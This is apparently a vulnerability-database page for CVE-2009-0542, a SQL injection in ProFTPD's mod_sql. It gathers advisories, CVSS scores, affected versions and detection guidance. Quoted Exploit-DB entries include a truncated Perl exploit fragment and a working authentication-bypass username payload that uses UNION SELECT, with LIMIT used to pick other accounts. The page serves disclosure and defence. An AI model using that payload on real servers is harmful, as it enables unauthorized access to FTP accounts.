CVE-2009-0542
published 2009-02-12CVE-2009-0542: SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in…
PriorityP266high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
74.73%
99.4th percentile
SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | proftpd-dfsg | < proftpd-dfsg 1.3.2-1 (bookworm) | proftpd-dfsg 1.3.2-1 (bookworm) |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor FTP USER commands containing a literal '%' character in the username field, as this triggers unescaped single-quote injection in mod_sql queries. ↗
- →Detect SQL UNION-based injection patterns in FTP login usernames, particularly patterns combining '%') with UNION SELECT targeting uid, gid, homedir, shell columns. ↗
- →Inspect MySQL/database query logs for ProFTPD authentication queries containing UNION SELECT or comment sequences (--) originating from the userid field, indicating exploitation. ↗
- →Exploitation allows authentication bypass with any password (e.g., '1'); alert on successful FTP logins where the username contains SQL metacharacters such as '%', UNION, or '--'. ↗
- →LIMIT clause manipulation in the injected username can be used to authenticate as arbitrary accounts in the users table; monitor for LIMIT keyword in FTP USER strings. ↗
- ·This vulnerability only affects ProFTPD installations using the mod_sql module for SQL-based authentication; plain file-based authentication is not affected. ↗
- ·A related but distinct issue (CVE-2009-0543) only affects ProFTPD installs with NLS (National Language Support) enabled; the default ./configure disables NLS, so most standard builds are not affected by CVE-2009-0543. ↗
- ·The vulnerability is fixed in ProFTPD 1.3.2 (and 1.3.2a packages); only 1.3.1 through 1.3.2rc2 are vulnerable. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5MEDIUM
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-m4rf-c9xj-c2gp: SQL injection vulnerability in ProFTPD Server 1
ghsa_unreviewed·2022-05-02
CVE-2009-0542 [HIGH] CWE-89 GHSA-m4rf-c9xj-c2gp: SQL injection vulnerability in ProFTPD Server 1
SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
OSV
CVE-2009-0542: SQL injection vulnerability in ProFTPD Server 1
osv·2009-02-12·CVSS 7.5
CVE-2009-0542 [HIGH] CVE-2009-0542: SQL injection vulnerability in ProFTPD Server 1
SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
Red Hat
proftpd: SQL injection during login
vendor_redhat·2009-02-10·CVSS 7.5
CVE-2009-0542 [HIGH] proftpd: SQL injection during login
proftpd: SQL injection during login
SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
Debian
CVE-2009-0542: proftpd-dfsg - SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remo...
vendor_debian·2009·CVSS 7.5
CVE-2009-0542 [HIGH] CVE-2009-0542: proftpd-dfsg - SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remo...
SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
Scope: local
bookworm: resolved (fixed in 1.3.2-1)
bullseye: resolved (fixed in 1.3.2-1)
forky: resolved (fixed in 1.3.2-1)
sid: resolved (fixed in 1.3.2-1)
trixie: resolved (fixed in 1.3.2-1)
No detection rules found.
Exploit-DB
ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection
exploitdb·2009-02-10
CVE-2009-0542 ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection
ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection
---
source: https://www.securityfocus.com/bid/33722/info
ProFTPD is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to manipulate SQL queries, modify data, or exploit latent vulnerabilities in the underlying database. This may result in unauthorized access and a compromise of the application; other attacks are also possible.
ProFTPD 1.3.1 through 1.3.2 rc 2 are vulnerable.
# Credits Go For gat3way For Finding The Bug ! [AT] http://milw0rm.com/exploits/8037
# Exploited By AlpHaNiX
# HomePage NullArea.Net
# Greetz For Zigma-Djekmani-r1z
use Net::FTP;
if (@ARGV new("$host", Debug => 0) or die "[!] Cannot co
Exploit-DB
ProFTPd - 'mod_mysql' Authentication Bypass
exploitdb·2009-02-10
CVE-2009-0543 ProFTPd - 'mod_mysql' Authentication Bypass
ProFTPd - 'mod_mysql' Authentication Bypass
---
Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
and a password of "1" (without quotes).
which leads to a successful login. Different account logins can be made successful using the limit clase (e.g appending "LIMIT 5,1" will make you login with as the 5th account in the users table).
As far as I can see in the mysql logs the query becomes:
SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1
I think the problem lies in the handling of the "%" character (probably that's
http://bugs.proftpd.org/show_bug.cgi?id=3180http://secunia.com/advisories/34268http://security.gentoo.org/glsa/glsa-200903-27.xmlhttp://www.debian.org/security/2009/dsa-1730http://www.mandriva.com/security/advisories?name=MDVSA-2009:061http://www.openwall.com/lists/oss-security/2009/02/11/1http://www.openwall.com/lists/oss-security/2009/02/11/3http://www.openwall.com/lists/oss-security/2009/02/11/5http://www.securityfocus.com/archive/1/500823/100/0/threadedhttp://www.securityfocus.com/archive/1/500833/100/0/threadedhttp://www.securityfocus.com/archive/1/500851/100/0/threadedhttp://www.securityfocus.com/archive/1/500852/100/0/threadedhttps://www.exploit-db.com/exploits/8037http://bugs.proftpd.org/show_bug.cgi?id=3180http://secunia.com/advisories/34268http://security.gentoo.org/glsa/glsa-200903-27.xmlhttp://www.debian.org/security/2009/dsa-1730http://www.mandriva.com/security/advisories?name=MDVSA-2009:061http://www.openwall.com/lists/oss-security/2009/02/11/1http://www.openwall.com/lists/oss-security/2009/02/11/3http://www.openwall.com/lists/oss-security/2009/02/11/5http://www.securityfocus.com/archive/1/500823/100/0/threadedhttp://www.securityfocus.com/archive/1/500833/100/0/threadedhttp://www.securityfocus.com/archive/1/500851/100/0/threadedhttp://www.securityfocus.com/archive/1/500852/100/0/threadedhttps://www.exploit-db.com/exploits/8037
2009-02-12
Published